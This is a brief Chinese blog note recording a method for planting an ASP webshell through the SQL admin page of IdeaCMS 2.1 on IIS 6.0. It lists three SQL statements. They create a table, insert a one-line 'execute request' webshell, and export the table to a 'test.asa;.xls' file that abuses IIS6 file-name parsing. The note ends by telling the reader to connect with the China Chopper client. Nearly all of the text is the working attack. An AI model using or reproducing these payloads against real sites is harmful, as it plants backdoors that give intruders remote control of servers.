利用SQL高级助手获取webshell

随笔目的：只是为了自己，记录一下这个方法（非原创）而已。

测试系统：win2003+iis6.0+IdeaCMS 2.1

目标网站IP,物理路径如下图：

利用页面如下：

在输入框中依次输入下列三条语句即可：

1.  create table test(a varchar(50))#建立一个表test，其中含一个可变字段a

2.  insert into test(a) values ('<%execute request(chr(49))%>')#向表test中插入一条记录，值是一句话木马

3.  select * into [a] in 'C:\WWW\test.asa;.xls' 'excel 4.0;' from test;#表复制语句

#语句形式为：SELECT vale1, value2 into Table2 from Table1

#要求目标表Table2不存在，因为在插入时会自动创建表Table2，并将Table1中指定字段数据复制到Table2中。

执行无误后，用菜刀连接即可。